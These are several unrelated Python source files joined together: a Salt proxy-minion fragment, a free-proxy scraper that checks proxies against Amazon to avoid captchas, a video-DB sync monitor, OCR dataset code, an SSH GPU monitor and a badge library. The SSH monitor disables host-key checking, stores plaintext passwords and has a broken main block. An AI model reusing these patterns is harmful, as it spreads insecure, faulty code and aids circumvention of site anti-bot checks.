raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv='base')
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname)+\
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
'__master_alive_{0}'.format(self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
'__master_failback':
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job('__master_failback', persist=True)
else:
self.schedule.delete_job('__master_alive_{0}'.format(self.opts['master']), persist=True)
self.schedule.delete_job('__master_failback', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
|
proxy_list_scrape.py
|
import requests
from bs4 import BeautifulSoup
import pandas as pd
import re
from multiprocessing import Process, Queue, Pool, Manager
def testProxies(aProxy, headers, q):
#Declare All so we can use the queue
all=[]
if 'http' in aProxy:
printProxy = aProxy['http']
else:
printProxy = aProxy['https']
try:
#print("in the try")
r = requests.get("https://www.amazon.com/s?k=cereal&page=1", headers=headers, proxies=aProxy, timeout=15)
except:
#print("in the except")
#print("There was a connection error")
print("Bad Proxy Check: " + printProxy)
else:
#print("in the else")
content = r.content
soup = BeautifulSoup(content, features="lxml")
if len(soup.findAll('div', attrs={'data-index':re.compile(r'\d+')})) == 0:
#print("There was a captcha error")
print("Bad Proxy Check: " + printProxy)
else:
#If nothing is wrong with the proxy, add the proxy and put it in the queue
all.append(aProxy)
q.put(all)
return
def scrapeProxyList(proxyCounter):
#m = Manager()
#q = m.Queue() # use this manager Queue instead of multiprocessing Queue as that causes error
#qcount = 0
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0", "Accept-Encoding":"gzip, deflate", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "DNT":"1","Connection":"close", "Upgrade-Insecure-Requests":"1"}
#Create a list of dictionaries to return for proxy purposes
proxyList = []
#workingProxyList = []
r = requests.get("https://www.us-proxy.org/", headers=headers)
content = r.content
soup = BeautifulSoup(content, features="lxml")
#with open('proxy_scrape.html', 'w', encoding='utf-8') as outfile:
#outfile.write(str(soup))
#print(soup.encode('utf-8')) # uncomment this in case there is some non UTF-8 character in the content and
# you get error
for d in soup.findAll('tr'):
address = d.contents[0]
port = d.contents[1]
https = d.contents[6]
if address.text != "IP Address" and https is not None and address is not None and port is not None:
if https.text == "yes":
proxyList.append( {'http': 'http://' + address.text + ":" + port.text} )
elif https.text == "no":
proxyList.append( {'https': 'https://' + address.text + ":" + port.text} )
###TESTING THE PROXIES IS SOMETHING THAT SHOULD BE DONE MULTIPROCCESSED, SO WE'RE DOING THIS SHIT....
#p = {}
#for i in range(len(proxyList)):
# print("starting proxy process: ", i)
# p[i] = Process(target=testProxies, args=(proxyList[i], headers, q))
# p[i].start()
# join should be done in seperate for loop
# reason being that once we join within previous for loop, join for p1 will start working
# and hence will not allow the code to run after one iteration till that join is complete, ie.
# the thread which is started as p1 is completed, so it essentially becomes a serial work instead of
# parallel
#for i in range(len(proxyList)):
# p[i].join()
# print("Proxy " + str(i) + " joined")
#while q.empty() is not True:
# qcount = qcount+1
# queue_top = q.get()
# workingProxyList.append(queue_top[0])
# print("Proxy Q " + str(qcount) + " pulled")
#Only run once everything is done
#print("proxy qcount: ", qcount)
return proxyList[:proxyCounter]
#return workingProxyList
def scrapeProxyListUK(proxyCounter):
#m = Manager()
#q = m.Queue() # use this manager Queue instead of multiprocessing Queue as that causes error
#qcount = 0
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0", "Accept-Encoding":"gzip, deflate", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "DNT":"1","Connection":"close", "Upgrade-Insecure-Requests":"1"}
#Create a list of dictionaries to return for proxy purposes
proxyList = []
#workingProxyList = []
r = requests.get("https://free-proxy-list.net/uk-proxy.html", headers=headers)
content = r.content
soup = BeautifulSoup(content, features="lxml")
#with open('proxy_scrape.html', 'w', encoding='utf-8') as outfile:
#outfile.write(str(soup))
#print(soup.encode('utf-8')) # uncomment this in case there is some non UTF-8 character in the content and
# you get error
for d in soup.findAll('tr'):
address = d.contents[0]
port = d.contents[1]
https = d.contents[6]
if address.text != "IP Address" and https is not None and address is not None and port is not None:
if https.text == "yes":
proxyList.append( {'http': 'http://' + address.text + ":" + port.text} )
elif https.text == "no":
proxyList.append( {'https': 'https://' + address.text + ":" + port.text} )
###TESTING THE PROXIES IS SOMETHING THAT SHOULD BE DONE MULTIPROCCESSED, SO WE'RE DOING THIS SHIT....
#p = {}
#for i in range(len(proxyList)):
# print("starting proxy process: ", i)
# p[i] = Process(target=testProxies, args=(proxyList[i], headers, q))
# p[i].start()
# join should be done in seperate for loop
# reason being that once we join within previous for loop, join for p1 will start working
# and hence will not allow the code to run after one iteration till that join is complete, ie.
# the thread which is started as p1 is completed, so it essentially becomes a serial work instead of
# parallel
#for i in range(len(proxyList)):
# p[i].join()
# print("Proxy " + str(i) + " joined")
#while q.empty() is not True:
# qcount = qcount+1
# queue_top = q.get()
# workingProxyList.append(queue_top[0])
# print("Proxy Q " + str(qcount) + " pulled")
#Only run once everything is done
#print("proxy qcount: ", qcount)
return proxyList[:proxyCounter]
#return workingProxyList
#Comment this out after testing ;)
#print(scrapeProxyList())
|
vms_async_monitor.py
|
# coding: utf-8
#------------------------------
# video 数据同步监控
#------------------------------
import sys
import os
import json
import time
import threading
import subprocess
import shutil
import base64
sys.path.append("/usr/local/lib/python2.7/site-packages")
import psutil
sys.path.append(os.getcwd() + "/class/core")
reload(sys)
sys.setdefaultencoding('utf-8')
import requests
import db
import common
#------------Private Methods--------------
def updateStatus(sid, status):
common.M('video_tmp').where(
"id=?", (sid,)).setField('status', status)
def isDEmpty(data):
if len(data) > 0:
return False
return True
#------------Private Methods--------------
#------------Public Methods--------------
def isMasterNode():
run_model = common.getSysKV('run_model')
run_is_master = common.getSysKV('run_is_master')
if (run_model == '1') or (run_is_master == '1'):
return True
return False
def getNodeList(ismaster=1, status=0):
_list = common.M('node').field('id,info,port,name,ip').where(
'ismaster=? and status=?', (ismaster, status,)).select()
return _list
def postVideoDbAsyncTrigger(url, name):
ret = common.httpPost(url, {
'name': name
})
if ret:
return json.loads(ret)
return False
#------------Public Methods--------------
def videoDbIsChange():
'''
# Video DB 发送改变!由主服务器选择文件同步到那从服务器上
'''
mtime = os.stat('data/video.db').st_mtime
while True:
time_sleep = 2
if not isMasterNode():
time.sleep(time_sleep)
continue
tmp = os.stat('data/video.db').st_mtime
if tmp != mtime:
node_list = getNodeList(0, 1)
for x in xrange(0, len(node_list)):
# print(node_list[x])
url = 'http://' + node_list[x]['ip'] + \
':' + node_list[x]['port'] + \
'/async_slave_api/videoDbAsyncTrigger'
try:
r = postVideoDbAsyncTrigger(url, node_list[x]['name'])
if r and r['code'] == 0:
print("DB文件发生改变通知成功:" + url)
else:
print("DB文件发生改变通知失败:" + url)
except Exception as e:
print("DB文件发生改变异常通知失败:" + url + ':', e)
mtime = tmp
time.sleep(time_sleep)
def startTask():
import time
try:
while True:
time.sleep(2)
except:
time.sleep(60)
startTask()
if __name__ == "__main__":
# 同步文件
t = threading.Thread(target=videoDbIsChange)
t.setDaemon(True)
t.start()
startTask()
|
input_dataset.py
|
from .dataset import DataSet, DataSetMode, RawDataSet
from calamari_ocr.ocr.data_processing import DataPreprocessor
from calamari_ocr.ocr.text_processing import TextProcessor
from calamari_ocr.ocr.augmentation import DataAugmenter
from typing import Generator, Tuple, List, Any
import numpy as np
import multiprocessing
from collections import namedtuple
import queue
from calamari_ocr.utils.multiprocessing import tqdm_wrapper
from abc import ABC, abstractmethod
import logging
from .queue_helper import MaxElementsQueuer
logger = logging.getLogger(__name__)
class OrderedQueueTask:
def __init__(self, input_queue, output_queue, context=multiprocessing.get_context()):
self.input_queue = input_queue
self.output_queue = output_queue
self.context = context
self.p = self.context.Process(daemon=True, target=self.run)
def start(self):
self.p.start()
def stop(self):
self.p.terminate()
def join(self):
self.p.join()
def run(self) -> None:
data = []
current_idx = 0
while True:
while True:
try:
data.append(self.input_queue.get(timeout=0.1))
except queue.Empty:
continue
except KeyboardInterrupt:
return
break
data.sort(key=lambda data: data[0])
while len(data) > 0 and data[0][0] <= current_idx:
try:
self.output_queue.put(data[0], timeout=0.1)
self.output_queue.task_done()
del data[0]
current_idx += 1
except queue.Full:
continue
except KeyboardInterrupt:
return
DataProcessingTaskData = namedtuple("DataProcessingTaskData", [
"skip_invalid_gt",
"data_aug_ratio",
"text_processor",
"data_processor",
"data_augmenter",
"generate_only_non_augmented",
])
class DataProcessingTask:
def __init__(self, params, input_queue: multiprocessing.JoinableQueue, output_queue: multiprocessing.JoinableQueue, context=multiprocessing.get_context()):
self.params = params
self.input_queue = input_queue
self.output_queue = output_queue
self.p = context.Process(daemon=True, target=self.run)
def start(self):
self.p.start()
def stop(self):
self.p.terminate()
def join(self):
self.p.join()
def run(self) -> None:
while True:
try:
data = self.input_queue.get(timeout=0.1)
except queue.Empty:
continue
except KeyboardInterrupt:
# allow keyboard interrupt
return
out = self.apply_single(*data)
if out:
while True:
try:
self.output_queue.put(out, timeout=0.1)
break
except queue.Full:
continue
except KeyboardInterrupt:
return
self.output_queue.task_done()
def apply_single(self, idx, sample_id, line, text):
#if not dataset.is_sample_valid(sample, line, text):
# if not skip_invalid_gt:
# print("ERROR: invalid sample {}".format(sample))
# return None
if self.params.data_processor and line is not None:
line, params = self.params.data_processor.apply([line], 1, False)[0]
else:
params = None
if self.params.text_processor and text is not None:
text = self.params.text_processor.apply([text], 1, False)[0]
if line is not None and not self.params.generate_only_non_augmented.value and self.params.data_augmenter and np.random.rand() <= self.params.data_aug_ratio:
# data augmentation with given ratio
line, text = self.params.data_augmenter.augment_single(line, text)
return idx, sample_id, line, text, params
class InputDataset(ABC):
def __init__(self,
mode: DataSetMode,
):
self.mode = mode
self._generate_only_non_augmented = multiprocessing.Value('b', False)
self.initialized = False
def __enter__(self):
if self.initialized:
raise AssertionError("Input dataset already initialized.")
logger.debug("InputDataset {} entered".format(self))
self.initialized = True
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.initialized = False
logger.debug("InputDataset {} exited".format(self))
def check_initialized(self):
if not self.initialized:
raise AssertionError("InputDataset is not initialised. Call 'with InputDataset() as input_dataset:'. "
"After the scope is closed the threads will be closed, too, for cleaning up.")
@abstractmethod
def __len__(self):
return 0
@abstractmethod
def epoch_size(self):
return len(self)
@property
def generate_only_non_augmented(self):
return self._generate_only_non_augmented.value
@generate_only_non_augmented.setter
def generate_only_non_augmented(self, value):
self._generate_only_non_augmented.value = value
@abstractmethod
def text_generator(self) -> Generator[str, None, None]:
self.check_initialized()
@abstractmethod
def generator(self, epochs=1, text_only=False) -> Generator[Tuple[np.array, List[str], Any], None, None]:
self.check_initialized()
class RawInputDataset(InputDataset):
def __init__(self,
mode: DataSetMode,
raw_datas, raw_texts, raw_params,
):
super().__init__(mode)
self.preloaded_datas, self.preloaded_texts, self.preloaded_params = raw_datas, raw_texts, raw_params
def __len__(self):
if self._generate_only_non_augmented.value:
return len(self.preloaded_params)
return len(self.preloaded_datas)
def epoch_size(self):
return len(self)
def text_generator(self) -> Generator[str, None, None]:
self.check_initialized()
for text in self.preloaded_texts:
yield text
def generator(self, epochs=1, text_only=False) -> Generator[Tuple[np.array, List[str], Any], None, None]:
self.check_initialized()
for epoch in range(epochs):
if self.mode == DataSetMode.TRAIN:
# only train here, pred and eval are covered by else block
# train mode wont generate parameters
if self._generate_only_non_augmented.value:
# preloaded datas are ordered: first original data, then data augmented, however,
# preloaded params store the 'length' of the non augmented data
# thus, only orignal data is yielded
for data, text, params in zip(self.preloaded_datas, self.preloaded_texts, self.preloaded_params):
yield data, text, None
else:
# yield all data, however no params
for data, text in zip(self.preloaded_datas, self.preloaded_texts):
yield data, text, None
else:
# all other modes generate everything we got, but does not support data augmentation
for data, text, params in zip(self.preloaded_datas, self.preloaded_texts, self.preloaded_params):
yield data, text, params
class StreamingInputDataset(InputDataset):
def __init__(self,
dataset: DataSet,
data_preprocessor: DataPreprocessor,
text_preprocessor: TextProcessor,
data_augmenter: DataAugmenter = None,
data_augmentation_amount: float = 0,
skip_invalid_gt=True,
processes=4):
super().__init__(dataset.mode)
self.dataset = dataset
self.data_processor = data_preprocessor
self.text_processor = text_preprocessor
self.skip_invalid_gt = skip_invalid_gt
self.data_augmenter = data_augmenter
self.data_augmentation_amount = data_augmentation_amount
self.mp_context = multiprocessing.get_context('spawn')
self.processes = max(1, processes)
if data_augmenter and dataset.mode != DataSetMode.TRAIN and dataset.mode != DataSetMode.PRED_AND_EVAL:
# no pred_and_eval bc it's augmentation
raise Exception('Data augmentation is only supported for training, but got {} dataset instead'.format(dataset.mode))
if data_augmentation_amount > 0 and self.data_augmenter is None:
raise Exception('Requested data augmentation, but no data augmented provided. Use e. g. SimpleDataAugmenter')
self.data_input_queue = None
self.unordered_output_queue = None
self.data_processing_tasks = []
self.data_generator = None
self.ordered_output_queue = None
self.data_ordering = None
def __enter__(self):
super().__enter__()
# create all tasks and queues
self.max_queuer = MaxElementsQueuer(self.processes * 4, ctx=self.mp_context)
self.data_input_queue = self.max_queuer.input_queue
self.ordered_output_queue = self.max_queuer.output_queue
self.unordered_output_queue = self.mp_context.JoinableQueue()
self.data_processing_tasks = [
DataProcessingTask(
DataProcessingTaskData(
self.skip_invalid_gt,
self.data_augmentation_amount if self.data_augmentation_amount < 1 else 1 - 1 / (self.data_augmentation_amount + 1),
self.text_processor,
self.data_processor,
self.data_augmenter,
self._generate_only_non_augmented,
),
self.data_input_queue,
self.unordered_output_queue,
) for _ in range(self.processes)
]
self.data_generator = self.dataset.create_generator(self.mp_context, self.data_input_queue)
self.data_generator.start()
self.data_ordering = OrderedQueueTask(self.unordered_output_queue, self.ordered_output_queue, self.mp_context)
self.data_ordering.start()
for p in self.data_processing_tasks:
p.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
# stop all tasks
self.data_generator.stop()
for p in self.data_processing_tasks:
p.stop()
self.data_ordering.stop()
self.data_input_queue = None
self.unordered_output_queue = None
self.data_processing_tasks = []
self.data_generator = None
self.ordered_output_queue = None
self.data_ordering = None
super().__exit__(exc_type, exc_val, exc_tb)
def __len__(self):
return len(self.dataset.samples())
def epoch_size(self):
if self._generate_only_non_augmented.value:
return len(self)
if self.data_augmentation_amount >= 1:
return int(len(self) * (1 + self.data_augmentation_amount))
return int(1 / (1 - self.data_augmentation_amount) * len(self))
def to_raw_input_dataset(self, processes=1, progress_bar=False, text_only=False) -> RawInputDataset:
print("Preloading dataset type {} with size {}".format(self.dataset.mode, len(self)))
prev = self._generate_only_non_augmented.value
self._generate_only_non_augmented.value = True
datas, texts, params = zip(*list(tqdm_wrapper(self.generator(epochs=1, text_only=text_only),
desc="Preloading data", total=len(self.dataset),
progress_bar=progress_bar)))
preloaded_datas, preloaded_texts, preloaded_params = datas, texts, params
self._generate_only_non_augmented.value = prev
if (self.dataset.mode == DataSetMode.TRAIN or self.dataset.mode == DataSetMode.PRED_AND_EVAL) and self.data_augmentation_amount > 0:
abs_n_augs = int(self.data_augmentation_amount) if self.data_augmentation_amount >= 1 else int(self.data_augmentation_amount * len(self))
preloaded_datas, preloaded_texts \
= self.data_augmenter.augment_datas(list(datas), list(texts), n_augmentations=abs_n_augs,
processes=processes, progress_bar=progress_bar)
return RawInputDataset(self.mode, preloaded_datas, preloaded_texts, preloaded_params)
def text_generator(self) -> Generator[str, None, None]:
self.check_initialized()
for _, text, _ in self.generator(epochs=1, text_only=True):
if self.text_processor:
text = self.text_processor.apply([text], 1, False)[0]
yield text
def generator(self, epochs=1, text_only=False) -> Generator[Tuple[np.array, List[str], Any], None, None]:
self.check_initialized()
self.data_generator.request(epochs, text_only)
for epoch in range(epochs):
for iter in range(len(self.dataset)):
while True:
try:
global_id, id, line, text, params = self.ordered_output_queue.get(timeout=0.1)
yield line, text, params
except queue.Empty:
# test data ordering thread was canceled
if not self.data_ordering.p.is_alive() and self.ordered_output_queue.empty():
return
continue
except KeyboardInterrupt:
return
break
|
ssh.py
|
import logging
import socket
import threading
import paramiko
import configparser
import csv
import io
import time
ref = {
'timestamp': 0,
'name': 1,
'index': 2,
'utilization.gpu': 3,
'memory.total': 4,
'memory.free': 5,
'power.limit': 6,
'power.draw': 7
}
pause = False
def visualize(ssh_id, host, csv_str_gpu, str_ncore, str_cpu, host_info):
info = csv.reader(io.StringIO(csv_str_gpu))
rec_g = []
for line in info:
name = line[ref['name']].strip()
index = line[ref['index']].strip()
util = line[ref['utilization.gpu']].strip()
mem_tot = line[ref['memory.total']].strip()
mem_fre = line[ref['memory.free']].strip()
pwr_lim = line[ref['power.limit']].strip()
pwr_drw = line[ref['power.draw']].strip()
rec_g.append([name, index, util, mem_tot, mem_fre, pwr_lim, pwr_drw])
rec_c = str_cpu.strip().split(' ')
rec_n = str_ncore.strip()
host_info[ssh_id] = [host, rec_g, rec_n, rec_c]
def query_host(ssh_id, host, ssh_cfg, host_info, timeout):
# create
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
# always try to reconnect if connection failed
while True:
try:
# connect
ssh.connect(hostname=ssh_cfg["hostname"], port=ssh_cfg["port"], username=ssh_cfg["username"], password=ssh_cfg["password"], timeout=timeout)
gpu_str = "nvidia-smi --format=csv,noheader --query-gpu=timestamp,name,index,utilization.gpu,memory.total,memory.free,power.limit,power.draw"
ncore_str = "cat /proc/cpuinfo | grep processor | wc -l"
cpu_str = "cat /proc/loadavg"
while True:
stdin, stdout, stderr = ssh.exec_command(gpu_str, timeout=timeout)
out, err = stdout.read(), stderr.read()
if not out:
raise paramiko.SSHException
res_g = out
res_g = res_g.decode()
stdin, stdout, stderr = ssh.exec_command(ncore_str, timeout=timeout)
out, err = stdout.read(), stderr.read()
if not out:
raise paramiko.SSHException
res_n = out
res_n = res_n.decode()
stdin, stdout, stderr = ssh.exec_command(cpu_str, timeout=timeout)
out, err = stdout.read(), stderr.read()
if not out:
raise paramiko.SSHException
res_c = out
res_c = res_c.decode()
visualize(ssh_id, host, res_g, res_n, res_c, host_info)
time.sleep(3)
except (paramiko.SSHException, socket.error):
continue
except Exception as e:
logging.exception(e)
finally:
ssh.close()
def init():
cfg = configparser.ConfigParser()
cfg.read("ssh.config", encoding="utf-8")
host_names = cfg.sections()
cfg_name, host_names = host_names[0], host_names[1:]
if cfg_name != 'config':
raise Exception('[config] item should come first in configure file!')
cfg_dict = {}
cfg_dict['refresh'] = cfg.getint(cfg_name, 'refresh')
cfg_dict['timeout'] = cfg.getint(cfg_name, 'timeout')
cfg_dict['warmup'] = cfg.getint(cfg_name, 'warmup')
ssh_pool = {}
for host in host_names:
# read from config file
hostname = cfg.get(host, "hostname")
port = cfg.getint(host, "port")
username = cfg.get(host, "username")
password = cfg.get(host, "password")
ssh_cfg = {"hostname": hostname, "port": port, "username": username, "password": password}
# record
ssh_pool[host] = ssh_cfg
return ssh_pool, cfg_dict
if __name__ == '__main__':
ssh_pool = init()
host_info = {}
for (ssh_id, (host, ssh_cfg)) in enumerate(ssh_pool.items()):
t = threading.Thread(target=query_host, args=(ssh_id, host, ssh_cfg, host_info))
t.start()
print(host_info)
time.sleep(0.55)
print(host_info)
time.sleep(1)
print(host_info)
time.sleep(1)
print(host_info)
time.sleep(1)
print(host_info)
|
pcrlib.py
|
# pcrlib.py
###########################################################################################
# Author: Josh Joseph joshmd@bu.edu
# 4/29/16
# This is the main function library file for PCR hero....
from pymongo import MongoClient
from bson.objectid import ObjectId
import hashlib
import json
import bson.json_util
import time
import datetime
import requests
import threading
import requests
HOSTIP = requests.get('https://ipapi.co/ip/').text + ":8080/"
HOMEDIR = '/home/ubuntu/BadgeAPI/'
class PCRUser:
'''This is a convenience class which verifies that entries to the users collection are valid'''
def __init__(self, email, name, hashword):
self.email = email
self.name = name
self.hashword = hashword
def output(self):
return {"email" : self.email, "name" : self.name, "hashword" : self.hashword}
class PCRIssuer:
'''This is a convenience class which verifies that entries to the issuers collection are valid'''
def __init__(self, name, description, url):
self.name = name
self.description = description
self.url = url
def output(self):
"""returns attributes as a python dictionary"""
return {"name" : self.name, "description" : self.description, "url" : self.url}
def jsonize(self):
"""Returns a JSON file with the base badge info - needed for posting/hosting, baking, and awarding"""
data = json.dumps(self.output())
return data
def establish_here(self, hostdir= HOMEDIR + "issuers/"):
"""Uploads a JSON version of the issuer to the host server.
Needed to award the badge."""
badgeJSON = self.jsonize()
outfile = open(hostdir + self.name + ".json", 'w')
outfile.write(badgeJSON)
outfile.close()
def add_issuer(self, db):
"""adds the issuer to the database"""
db.issuers.insert_one(self.output())
class OpenBadge:
def __init__(self, name, description, image, criteria, tags, issuer):
"""This creates the base badge with the badge name, image URL, description, criteria URL, issuer json URL"""
self.name = name
## need sanitizing function here for name - sub for space
self.description = description
self.image = HOSTIP + "images/" + image
self.criteria = establish_criteria(name, criteria)
self.tags = tags.split()
self.issuer = HOSTIP + "issuers/" + issuer + ".json"
## need sanitizing function here for issuer - sub for space
def jsonize(self):
"""Returns a JSON file with the base badge info - needed for posting/hosting, baking, and awarding"""
data = json.dumps({"name": self.name, "description": self.description, "image": self.image, "criteria": self.criteria, "tags": self.tags, "issuer": self.issuer})
return data
def output(self):
"""Returns a dict with the base badge info - needed for posting/hosting, baking, and awarding"""
data = {"name": self.name, "description": self.description, "image": self.image, "criteria": self.criteria, "tags": self.tags, "issuer": self.issuer}
return data
def establish_here(self, hostdir= HOMEDIR + "badges/"):
"""Uploads a JSON version of the base badge class to the host server.
Needed to award the badge. Creates a .json file and adds it to the database"""
badgeJSON = self.jsonize()
outfile = open(hostdir + self.name.replace(" ", "-") + ".json", 'w')
outfile.write(badgeJSON)
outfile.close()
def add_badge(self, db):
"""add the badge to the database"""
db.badges.insert_one(self.output())
class Task:
"""base class for tasks
tasks are instantiated by the admin-tasks menu, which also assigns them"""
def __init__(self, user, badge, app):
self.user = user
self.badge = badge
self.app = app
def output(self):
pass
def assign(self, db):
"""checks for duplicates, returns false if duplicate, if not, logs the task and returns true"""
## check for duplicates
if(check_for_task(db, self.badge, self.user, self.app) != None):
return False
## if not, assign away...
else:
db.tasks.insert_one(self.output())
return True
class PercentTask(Task):
def __init__(self, user, badge, app, circuit, score, percent):
super().__init__(user, badge, app)
self.type = "percent"
self.circuit = circuit
self.score = score
self.percent = percent
self.goalScore = score * (percent / 100.0) ## this is the improved target score
def output(self):
"""returns output as a dict - exactly as we'll need for mongodb...
returns useremail, badgename, app, type, circuit, initial score, target score"""
data = {"user": self.user, "badge": self.badge, "app": self.app, "type": self.type, "circuit": self.circuit, "score": self.score, "goalScore": self.goalScore}
return data
class RepeatTask(Task):
def __init__(self, user, badge, app, circuit, repeat):
super().__init__(user, badge, app)
self.type = "repeat"
self.circuit = circuit
self.repeatTarget = repeat
self.repeatCount = 0 ## the number of times it has been repeated...
def output(self):
"""returns output as a dict - exactly as we'll need for mongodb..."""
data = {"user": self.user, "badge": self.badge, "app": self.app, "type": self.type, "circuit": self.circuit, "repeatTarget": self.repeatTarget, "count": self.repeatCount}
return data
class UniqueTask(Task):
def __init__(self, user, badge, app, unique):
super().__init__(user, badge, app)
self.type = "unique"
self.uniqueGoal = unique ## needed number of unique submissions
self.uniqueList = [] ## list of submissions
def output(self):
"""returns output as a dict - exactly as we'll need for mongodb..."""
data = {"user": self.user, "badge": self.badge, "app": self.app, "type": self.type, "uniqueGoal": self.uniqueGoal, "uniqueList": self.uniqueList}
return data
class TimeTrialTask(Task):
def __init__(self, user, badge, app, days, hours, minutes, circuit, tasknum):
super().__init__(user, badge, app)
self.type = "timetrial"
self.circuit = circuit
self.tasknumGoal = tasknum
self.tasksDone = 0
self.days = days
self.hours = hours
self.minutes = minutes
now = datetime.datetime.now()
setTime = now + datetime.timedelta(days = self.days, hours=self.hours, minutes=self.minutes)
self.duedate = setTime
def output(self):
"""returns output as a dict - exactly as we'll need for mongodb..."""
data = {"user": self.user, "badge": self.badge, "app": self.app, "type": self.type, "circuit": self.circuit, "tasknumGoal": self.tasknumGoal, "tasksDone": self.tasksDone, "duedate" : self.duedate}
return data
class PerformanceTask(Task):
def __init__(self, user, badge, app, circuit, targetyield, cost):
super().__init__(user, badge, app)
self.type = "performance"
self.circuit = circuit
self.targetyield = targetyield
self.cost = cost ## the cost that one needs to stay below...
def output(self):
"""returns output as a dict - exactly as we'll need for mongodb..."""
data = {"user": self.user, "badge": self.badge, "app": self.app, "type": self.type, "circuit": self.circuit, "targetyield": self.targetyield, "cost": self.cost}
return data
def award_badge_to_user(db, badgename, username, hostdir=HOMEDIR + "awardedbadges/"):
"""awards a badge to a recipient, creating a publicly hosted json of the badge info (a badge assertion)
located at "http://HOMEIP/awardedbadges/"
the recipient will be a json with the user's email (hashed), type (email), hashed (boolean), and salt"""
### Part one - create the badge assertion
email = username
username = sanitize(username)
badgename = badgename.replace(" ", "-")
badgesource = open(HOMEDIR + "badges/" + badgename + ".json", "r")
badgedict = json.load(badgesource)
uid = username + badgename ## this is a unique internal identifier for the mozilla standard
verifyAddress = HOSTIP + "awardedbadges/" + uid + ".json"
badgeAddress = HOSTIP + "badges/" + badgename + ".json"
issuedOn = str(time.time()).split('.')[0]
verify = {"type": "hosted", "url": verifyAddress}
recipient = create_recipient(email)
data = json.dumps({"uid": uid, "recipient": recipient, "image": badgedict['image'], "issuedOn": issuedOn, "badge": badgeAddress, "verify": verify})
print(data)
# ASSERTION FILE #
outfile = open(hostdir + uid + ".json", 'w') ## so the final assertion is at /awardedbadges/sanitized+badgename.json
outfile.write(data)
outfile.close()
### Part two - add the badge to the user's profile
entry = {"email": email}
# get the stored JSON data from the badge file, store it in a dict
db.users.update_one(entry, {"$push":{"badges": badgedict}})
# BAKED IMAGE + ADD BADGE TO USERS PROFILE
bake(badgename, username, badgedict, db)
################################################################################################################
# Badge Baking Function - use with caution
# This sends the badge info to the Mozilla Badge Baking API. The issue with this is that you need somewhere to
# actually put it - unless the mozilla badge display API is also added to the site (needs node.js)
# then it only shows the png, rather than any of the metadata.
# one option would be to email it to users, or to simply host it at a specific location and add a download link.
################################################################################################################
def bake(badgename, username, badgedict, db, hostname=(HOSTIP +"badges/")):
"""Uses the existing Mozilla Badge Baking Web API to create a png with baked-in data
badgename is a json, host is a url leading to the badge directory, filename is the output png (needs a path!)"""
email = username
username = sanitize(username)
badgename = badgename.replace(" ", "-")
uid = username + badgename
fileExt = "bakedawarded/" + "bake" + uid + ".png"
hostedURL = HOSTIP + "awardedbadges/" + uid + ".json"
print("Badge hosted at " + hostedURL)
getURL = "http://backpack.openbadges.org/baker?assertion=" + hostedURL
print("Baking badge at " + getURL)
bakePlease = threading.Thread(target = threadBake, args = (getURL, fileExt, badgedict, email, db))
bakePlease.start()
def threadBake(getURL, filename, badgedict, email, db):
returnObj = "none"
response = requests.get(getURL);
if(response.status_code == 200):
print("Baking badge... %s" % (HOSTIP + filename))
